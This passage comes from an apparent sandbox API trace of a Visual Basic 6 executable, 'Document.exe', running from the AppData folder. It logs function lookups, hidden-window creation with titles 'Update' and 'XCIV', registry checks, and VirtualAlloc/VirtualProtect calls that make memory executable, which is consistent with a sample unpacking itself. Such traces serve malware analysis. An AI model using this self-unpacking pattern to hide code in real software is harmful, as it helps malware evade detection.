(hModule=0x76720000, lpProcName="VarAnd") returned 0x76745a98 [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarCat") returned 0x767459b4 [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarDiv") returned 0x7679e405 [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarEqv") returned 0x7679ef07 [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarIdiv") returned 0x7679f00a [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarImp") returned 0x7679ef47 [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarMod") returned 0x7679f15e [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarMul") returned 0x7679dbd4 [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarOr") returned 0x7679ecfa [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarPow") returned 0x7679ea66 [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarSub") returned 0x7679d332 [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarXor") returned 0x7679ee2e [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarAbs") returned 0x7679ca11 [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarFix") returned 0x7679cc5f [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarInt") returned 0x7679cde7 [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarNeg") returned 0x7679c802 [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarNot") returned 0x7679ec66 [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarRound") returned 0x7679d155 [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarCmp") returned 0x7673b0dc [0192.572] GetProcAddress (hModule=0x76720000, lpProcName="VarDecAdd") returned 0x76755f3e [0192.573] GetProcAddress (hModule=0x76720000, lpProcName="VarDecCmp") returned 0x76744fd0 [0192.573] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrCat") returned 0x76740d2c [0192.573] GetProcAddress (hModule=0x76720000, lpProcName="VarCyMulI4") returned 0x767559ed [0192.573] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrCmp") returned 0x7672f8b8 [0192.573] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75cf0000 [0192.573] GetProcAddress (hModule=0x75cf0000, lpProcName="CoCreateInstanceEx") returned 0x75d39d4e [0192.573] GetProcAddress (hModule=0x75cf0000, lpProcName="CLSIDFromProgIDEx") returned 0x75d00782 [0192.573] GetSystemMetrics (nIndex=42) returned 0 [0192.573] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x75e366bc) returned 0x0 [0192.573] IMalloc:Alloc (This=0x75e366bc, cb=0x4) returned 0x5d90a0 [0192.573] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f968, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.575] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe.cfg") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe.cfg" [0192.575] SetLastError (dwErrCode=0x0) [0192.575] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x18f864, lpFilePart=0x18f838 | out: lpBuffer="|ú\x18", lpFilePart=0x18f838) returned 0x0 [0192.575] SetLastError (dwErrCode=0x2) [0192.575] GetLastError () returned 0x2 [0192.575] lstrcmpiA (lpString1="Document", lpString2="MTX") returned -1 [0192.575] lstrcmpiA (lpString1="Document", lpString2="DLLHOST") returned 1 [0192.575] lstrcmpiA (lpString1="Document", lpString2="INETINFO") returned -1 [0192.575] lstrcmpiA (lpString1="Document", lpString2="W3WP") returned -1 [0192.575] lstrcmpiA (lpString1="Document", lpString2="ASPNET_WP") returned 1 [0192.575] lstrcmpiA (lpString1="Document", lpString2="DLLHST3G") returned 1 [0192.575] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f95c, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.575] lstrcmpiA (lpString1="Document", lpString2="IEXPLORE") returned -1 [0192.575] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x757f0000 [0192.579] GetLastError () returned 0x0 [0192.579] GetProcAddress (hModule=0x757f0000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x75837685 [0192.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18feac, cbMultiByte=-1, lpWideCharStr=0x18fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0192.579] CoRegisterMessageFilter (in: lpMessageFilter=0x2362054, lplpMessageFilter=0x236205c | out: lplpMessageFilter=0x236205c*=0x0) returned 0x0 [0192.579] IUnknown:AddRef (This=0x2362054) returned 0x2 [0192.579] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x18fe78 | out: lpwcx=0x18fe78) returned 0 [0192.579] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x3c027d [0192.580] GetModuleHandleA (lpModuleName="USER32") returned 0x77820000 [0192.580] GetProcAddress (hModule=0x77820000, lpProcName="GetSystemMetrics") returned 0x77837d2f [0192.580] GetProcAddress (hModule=0x77820000, lpProcName="MonitorFromWindow") returned 0x77843150 [0192.580] GetProcAddress (hModule=0x77820000, lpProcName="MonitorFromRect") returned 0x7785e7a0 [0192.580] GetProcAddress (hModule=0x77820000, lpProcName="MonitorFromPoint") returned 0x77845281 [0192.580] GetProcAddress (hModule=0x77820000, lpProcName="EnumDisplayMonitors") returned 0x7784451a [0192.581] GetProcAddress (hModule=0x77820000, lpProcName="GetMonitorInfoA") returned 0x77844413 [0192.581] GetSystemMetrics (nIndex=0) returned 1440 [0192.581] GetSystemMetrics (nIndex=78) returned 1440 [0192.581] GetSystemMetrics (nIndex=1) returned 900 [0192.581] GetSystemMetrics (nIndex=79) returned 900 [0192.581] GetSystemMetrics (nIndex=50) returned 16 [0192.581] GetSystemMetrics (nIndex=49) returned 16 [0192.581] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0xa02cf [0192.581] RegisterClassExA (param_1=0x18fe78) returned 0x8ec1c3 [0192.581] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x40222 [0192.582] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x81, wParam=0x0, lParam=0x18fa5c) returned 0x1 [0192.584] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x83, wParam=0x0, lParam=0x18fa48) returned 0x0 [0192.584] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x1, wParam=0x0, lParam=0x18fa5c) returned 0x0 [0192.584] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0192.584] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0192.584] MonitorFromWindow (hwnd=0x40222, dwFlags=0x2) returned 0x10001 [0192.584] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fe80 | out: lpmi=0x18fe80) returned 1 [0192.584] SetWindowPos (hWnd=0x40222, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0192.584] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x46, wParam=0x0, lParam=0x18fe20) returned 0x0 [0192.630] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x47, wParam=0x0, lParam=0x18fe20) returned 0x0 [0192.630] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0192.630] ShowWindow (hWnd=0x40222, nCmdShow=4) returned 0 [0192.631] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0192.631] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x46, wParam=0x0, lParam=0x18fe34) returned 0x0 [0192.632] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x47, wParam=0x0, lParam=0x18fe34) returned 0x0 [0192.632] GetWindowThreadProcessId (in: hWnd=0x40222, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x94c [0192.632] VirtualQuery (in: lpAddress=0x18fea8, lpBuffer=0x18fe8c, dwLength=0x1c | out: lpBuffer=0x18fe8c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.632] GetUserDefaultLCID () returned 0x409 [0192.632] IsValidCodePage (CodePage=0x3a4) returned 1 [0192.652] IsValidCodePage (CodePage=0x3b5) returned 1 [0192.723] IsValidCodePage (CodePage=0x3b6) returned 1 [0192.770] IsValidCodePage (CodePage=0x3a8) returned 1 [0192.820] GetUserDefaultLangID () returned 0x409 [0192.820] GetSystemDefaultLangID () returned 0x5d0409 [0192.820] GetSystemMetrics (nIndex=42) returned 0 [0192.820] IMalloc:Alloc (This=0x75e366bc, cb=0xa8) returned 0x5dd868 [0192.820] IMalloc:GetSize (This=0x75e366bc, pv=0x5dd868) returned 0xa8 [0192.820] IMalloc:Alloc (This=0x75e366bc, cb=0xc) returned 0x5dcf90 [0192.820] GetCurrentThreadId () returned 0x94c [0192.820] IMalloc:Alloc (This=0x75e366bc, cb=0x3c) returned 0x5da030 [0192.820] IMalloc:Alloc (This=0x75e366bc, cb=0x1c) returned 0x5d9930 [0192.864] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fe74 | out: phkResult=0x18fe74*=0x0) returned 0x2 [0192.864] IMalloc:Alloc (This=0x75e366bc, cb=0x1c) returned 0x5d9958 [0192.865] GetCurrentThreadId () returned 0x94c [0192.865] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0x94c) returned 0xb02b3 [0192.865] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x18fdcc | out: lpWndClass=0x18fdcc) returned 0 [0192.865] RegisterClassA (lpWndClass=0x18fdcc) returned 0x98c1c5 [0192.865] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x5029e [0192.865] NtdllDefWindowProc_A (hWnd=0x5029e, Msg=0x81, wParam=0x0, lParam=0x18fa08) returned 0x1 [0192.866] NtdllDefWindowProc_A (hWnd=0x5029e, Msg=0x83, wParam=0x0, lParam=0x18f9f4) returned 0x0 [0192.866] NtdllDefWindowProc_A (hWnd=0x5029e, Msg=0x1, wParam=0x0, lParam=0x18fa08) returned 0x0 [0192.866] NtdllDefWindowProc_A (hWnd=0x5029e, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0192.866] NtdllDefWindowProc_A (hWnd=0x5029e, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0192.866] SetWindowLongA (hWnd=0x5029e, nIndex=0, dwNewLong=37101724) returned 0 [0192.866] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0192.866] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0192.866] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0192.866] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0192.866] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0192.866] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0192.866] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0192.866] CreateCompatibleDC (hdc=0x0) returned 0x330107bb [0192.867] GetCurrentObject (hdc=0x330107bb, type=0x7) returned 0x185000f [0192.867] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x40222, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x702b6 [0192.867] NtdllDefWindowProc_A (hWnd=0x702b6, Msg=0x81, wParam=0x0, lParam=0x18fa98) returned 0x1 [0192.867] NtdllDefWindowProc_A (hWnd=0x702b6, Msg=0x83, wParam=0x0, lParam=0x18fa84) returned 0x0 [0192.867] NtdllDefWindowProc_A (hWnd=0x702b6, Msg=0x1, wParam=0x0, lParam=0x18fa98) returned 0x0 [0192.867] NtdllDefWindowProc_A (hWnd=0x702b6, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0192.867] NtdllDefWindowProc_A (hWnd=0x702b6, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0192.867] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x210, wParam=0x1, lParam=0x702b6) returned 0x0 [0192.868] GetCurrentThreadId () returned 0x94c [0192.868] GetCurrentThreadId () returned 0x94c [0192.868] lstrlenA (lpString="VB") returned 2 [0192.868] lstrlenA (lpString="Frame") returned 5 [0192.869] lstrlenA (lpString="VB") returned 2 [0192.869] lstrlenA (lpString="CommandButton") returned 13 [0192.913] lstrlenA (lpString="VB") returned 2 [0192.913] lstrlenA (lpString="ListBox") returned 7 [0192.913] lstrlenA (lpString="VB") returned 2 [0192.913] lstrlenA (lpString="Printer") returned 7 [0192.914] lstrlenA (lpString="VB") returned 2 [0192.914] lstrlenA (lpString="Form") returned 4 [0192.914] lstrlenA (lpString="VB") returned 2 [0192.914] lstrlenA (lpString="Screen") returned 6 [0192.915] lstrlenA (lpString="VB") returned 2 [0192.915] lstrlenA (lpString="Clipboard") returned 9 [0192.915] lstrlenA (lpString="VB") returned 2 [0192.915] lstrlenA (lpString="MDIForm") returned 7 [0192.915] lstrlenA (lpString="VB") returned 2 [0192.915] lstrlenA (lpString="App") returned 3 [0192.916] lstrlenA (lpString="VB") returned 2 [0192.916] lstrlenA (lpString="UserControl") returned 11 [0192.916] lstrlenA (lpString="VB") returned 2 [0192.916] lstrlenA (lpString="PropertyPage") returned 12 [0192.917] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0192.917] lstrlenA (lpString="VB") returned 2 [0192.917] lstrlenA (lpString="UserDocument") returned 12 [0193.013] GetCurrentThreadId () returned 0x94c [0193.013] GetCurrentThreadId () returned 0x94c [0193.051] lstrlenA (lpString="VB") returned 2 [0193.051] lstrlenA (lpString="PictureBox") returned 10 [0193.052] lstrlenA (lpString="VB") returned 2 [0193.052] lstrlenA (lpString="Label") returned 5 [0193.052] lstrlenA (lpString="VB") returned 2 [0193.052] lstrlenA (lpString="TextBox") returned 7 [0193.053] lstrlenA (lpString="VB") returned 2 [0193.053] lstrlenA (lpString="CheckBox") returned 8 [0193.053] lstrlenA (lpString="VB") returned 2 [0193.053] lstrlenA (lpString="OptionButton") returned 12 [0193.054] lstrlenA (lpString="VB") returned 2 [0193.054] lstrlenA (lpString="ComboBox") returned 8 [0193.054] lstrlenA (lpString="VB") returned 2 [0193.055] lstrlenA (lpString="HScrollBar") returned 10 [0193.055] lstrlenA (lpString="VB") returned 2 [0193.055] lstrlenA (lpString="VScrollBar") returned 10 [0193.056] lstrlenA (lpString="VB") returned 2 [0193.056] lstrlenA (lpString="Timer") returned 5 [0193.056] lstrlenA (lpString="VB") returned 2 [0193.056] lstrlenA (lpString="DriveListBox") returned 12 [0193.056] lstrlenA (lpString="VB") returned 2 [0193.056] lstrlenA (lpString="DirListBox") returned 10 [0193.057] lstrlenA (lpString="VB") returned 2 [0193.057] lstrlenA (lpString="FileListBox") returned 11 [0193.057] lstrlenA (lpString="VB") returned 2 [0193.057] lstrlenA (lpString="Menu") returned 4 [0193.058] lstrlenA (lpString="VB") returned 2 [0193.058] lstrlenA (lpString="Shape") returned 5 [0193.058] lstrlenA (lpString="VB") returned 2 [0193.058] lstrlenA (lpString="Line") returned 4 [0193.059] lstrlenA (lpString="VB") returned 2 [0193.059] lstrlenA (lpString="Image") returned 5 [0193.059] lstrlenA (lpString="VB") returned 2 [0193.059] lstrlenA (lpString="Data") returned 4 [0193.059] lstrlenA (lpString="VB") returned 2 [0193.060] lstrlenA (lpString="OLE") returned 3 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x5de918 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x5de988 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x5de9f8 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x5dea68 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x5dead8 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x5deb48 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x5debb8 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x64) returned 0x5dec28 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0xc) returned 0x5dcfa8 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0xb8) returned 0x5dec98 [0193.114] IMalloc:GetSize (This=0x75e366bc, pv=0x5dec98) returned 0xb8 [0193.114] IMalloc:Alloc (This=0x75e366bc, cb=0x20) returned 0x5d9ac0 [0193.160] GetCurrentThreadId () returned 0x94c [0193.160] GetCurrentThreadId () returned 0x94c [0193.161] IMalloc:Alloc (This=0x75e366bc, cb=0x1c) returned 0x5d9ae8 [0193.161] VirtualProtect (in: lpAddress=0x220000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x20) returned 1 [0193.161] GetCurrentProcess () returned 0xffffffff [0193.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x220000, dwSize=0x6000) returned 1 [0193.161] VirtualAlloc (lpAddress=0x220000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0193.161] VirtualAlloc (lpAddress=0x220000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0193.162] VirtualAlloc (lpAddress=0x220000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0193.162] VirtualAlloc (lpAddress=0x220000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0193.162] VirtualProtect (in: lpAddress=0x220000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x4) returned 1 [0193.162] GetCurrentProcess () returned 0xffffffff [0193.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x220000, dwSize=0xa000) returned 1 [0193.162] GetCurrentThreadId () returned 0x94c [0193.172] GetCurrentThreadId () returned 0x94c [0193.172] SetWindowTextA (hWnd=0x40222, lpString="Update") returned 1 [0193.172] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0xc, wParam=0x0, lParam=0x18fd6c) returned 0x1 [0193.172] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fd54 | out: phkResult=0x18fd54*=0x0) returned 0x2 [0193.254] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0193.254] VirtualQuery (in: lpAddress=0x18f780, lpBuffer=0x18f764, dwLength=0x1c | out: lpBuffer=0x18f764*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.316] IMalloc:Alloc (This=0x75e366bc, cb=0x54) returned 0x5df050 [0193.316] IMalloc:GetSize (This=0x75e366bc, pv=0x5df050) returned 0x54 [0193.363] GetCurrentThreadId () returned 0x94c [0193.363] GetCurrentThreadId () returned 0x94c [0193.364] GetCurrentThreadId () returned 0x94c [0193.504] GetCurrentThreadId () returned 0x94c [0193.504] GetCurrentThreadId () returned 0x94c [0193.505] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb4 [0193.597] GetVersionExA (in: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x136668c, dwMinorVersion=0x18f9cc, dwBuildNumber=0x18fd00, dwPlatformId=0x18ff70, szCSDVersion="\xcd\x1e\xe9\x77\x92\xb5\x15") | out: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0193.597] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0193.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x72992cd8, cbMultiByte=-1, lpWideCharStr=0x18faa4, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0193.644] OleCreateFontIndirect () returned 0x0 [0193.645] lstrlenA (lpString="XCIV") returned 4 [0193.785] OleLoadPictureEx () returned 0x0 [0193.942] lstrlenA (lpString="Form1") [0193.942] lstrlenA (lpString="ThunderRT6") returned 10 [0193.943] lstrcpyA (in: lpString1=0x18fab8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0193.943] lstrlenA (lpString="ThunderRT6Form") returned 14 [0193.943] lstrcpynA (in: lpString1=0x18fac6, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0193.943] lstrlenA (lpString="ThunderRT6") returned 10 [0193.943] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0193.943] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x18fa78 | out: lpWndClass=0x18fa78) returned 0 [0193.943] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0193.943] RegisterClassA (lpWndClass=0x18fa78) returned 0xe3c1ed [0193.943] lstrlenA (lpString="ThunderRT6") returned 10 [0193.943] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0193.943] lstrlenA (lpString="ThunderRT6Form") returned 14 [0193.943] lstrcpynA (in: lpString1=0x18fa5a, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0193.943] RegisterClassA (lpWndClass=0x18fa78) returned 0xc1ee [0193.943] AdjustWindowRectEx (in: lpRect=0x18fb78, dwStyle=0x2c80000, bMenu=0, dwExStyle=0x80 | out: lpRect=0x18fb78) returned 1 [0193.943] CreateWindowExA (dwExStyle=0x80, lpClassName=0xc1ee, lpWindowName="XCIV", dwStyle=0x2c80000, X=-2147483648, Y=-2147483648, nWidth=550, nHeight=302, hWndParent=0x40222, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x7028c [0193.944] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x81, wParam=0x0, lParam=0x18f69c) returned 0x1 [0193.945] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x83, wParam=0x0, lParam=0x18f688) returned 0x0 [0193.947] GetSystemMenu (hWnd=0x7028c, bRevert=0) returned 0x2c008d [0193.949] SetWindowContextHelpId (param_1=0x7028c, param_2=0xffffffff) returned 1 [0193.949] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x1, wParam=0x0, lParam=0x18f69c) returned 0x0 [0193.949] GetWindowRect (in: hWnd=0x7028c, lpRect=0x18fb3c | out: lpRect=0x18fb3c) returned 1 [0193.949] GetDC (hWnd=0x7028c) returned 0x770109b2 [0193.949] GetTextMetricsA (in: hdc=0x770109b2, lptm=0x18fa64 | out: lptm=0x18fa64) returned 1 [0193.949] SetBkMode (hdc=0x770109b2, mode=1) returned 2 [0193.949] OleTranslateColor () returned 0x0 [0193.949] SetBkColor (hdc=0x770109b2, color=0xf0f0f0) returned 0xffffff [0193.949] OleTranslateColor () returned 0x0 [0193.949] SetTextColor (hdc=0x770109b2, color=0x0) returned 0x0 [0193.949] OleTranslateColor () returned 0x0 [0193.949] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0xffffffff9f3009b1 [0193.949] SelectObject (hdc=0x770109b2, h=0x9f3009b1) returned 0x1b00017 [0193.949] SelectObject (hdc=0x770109b2, h=0x1900011) returned 0x1900010 [0193.949] ClientToScreen (in: hWnd=0x7028c, lpPoint=0x18fa44 | out: lpPoint=0x18fa44) returned 1 [0193.949] SetBrushOrgEx (in: hdc=0x770109b2, x=0, y=2, lppt=0x0 | out: lppt=0x0) returned 1 [0193.949] UnrealizeObject (h=0x1900015) returned 1 [0193.949] SelectObject (hdc=0x770109b2, h=0x1900015) returned 0x1900011 [0193.950] SelectObject (hdc=0x770109b2, h=0x650a07c3) returned 0x18a002e [0193.950] GetTextMetricsA (in: hdc=0x770109b2, lptm=0x18f858 | out: lptm=0x18f858) returned 1 [0194.159] lstrlenA (lpString="ThunderRT6") returned 10 [0194.159] lstrcpyA (in: lpString1=0x18fa88, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0194.159] lstrlenA (lpString="ThunderRT6") returned 10 [0194.159] lstrcpyA (in: lpString1=0x18fa1c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0194.159] GetClassInfoA (in: hInstance=0x0, lpClassName="Button", lpWndClass=0x18fa48 | out: lpWndClass=0x18fa48) returned 1 [0194.159] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Frame", lpWndClass=0x18fa48 | out: lpWndClass=0x18fa48) returned 0 [0194.159] RegisterClassA (lpWndClass=0x18fa48) returned 0x11c1ef [0194.159] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1ef, lpWindowName=0x0, dwStyle=0x46010007, X=16, Y=16, nWidth=513, nHeight=209, hWndParent=0x7028c, hMenu=0x1, hInstance=0x72940000, lpParam=0x0) returned 0x502a0 [0194.160] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x81, wParam=0x0, lParam=0x18f66c) returned 0x1 [0194.160] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x83, wParam=0x0, lParam=0x18f658) returned 0x0 [0194.160] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x1, wParam=0x0, lParam=0x18f66c) returned 0x0 [0194.161] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x5, wParam=0x0, lParam=0xd10201) returned 0x0 [0194.161] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x3, wParam=0x0, lParam=0x100010) returned 0x0 [0194.161] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x30, wParam=0x420a09aa, lParam=0x0) returned 0x0 [0194.161] ShowWindow (hWnd=0x502a0, nCmdShow=5) returned 0 [0194.161] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0194.162] lstrlenA (lpString="1") returned 1 [0194.162] lstrlenA (lpString="ThunderRT6") returned 10 [0194.162] lstrcpyA (in: lpString1=0x18fa58, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0194.162] lstrlenA (lpString="ThunderRT6") returned 10 [0194.162] lstrcpyA (in: lpString1=0x18f9ec, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0194.162] GetClassInfoA (in: hInstance=0x0, lpClassName="Button", lpWndClass=0x18fa18 | out: lpWndClass=0x18fa18) returned 1 [0194.162] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6CommandButton", lpWndClass=0x18fa18 | out: lpWndClass=0x18fa18) returned 0 [0194.162] RegisterClassA (lpWndClass=0x18fa18) returned 0xc1f0 [0194.162] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1f0, lpWindowName="1", dwStyle=0x44012000, X=16, Y=168, nWidth=233, nHeight=25, hWndParent=0x502a0, hMenu=0x2, hInstance=0x72940000, lpParam=0x0) returned 0x502b8 [0194.163] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x81, wParam=0x0, lParam=0x18f63c) returned 0x1 [0194.163] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x83, wParam=0x0, lParam=0x18f628) returned 0x0 [0194.163] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x1, wParam=0x0, lParam=0x18f63c) returned 0x0 [0194.163] CallWindowProcA 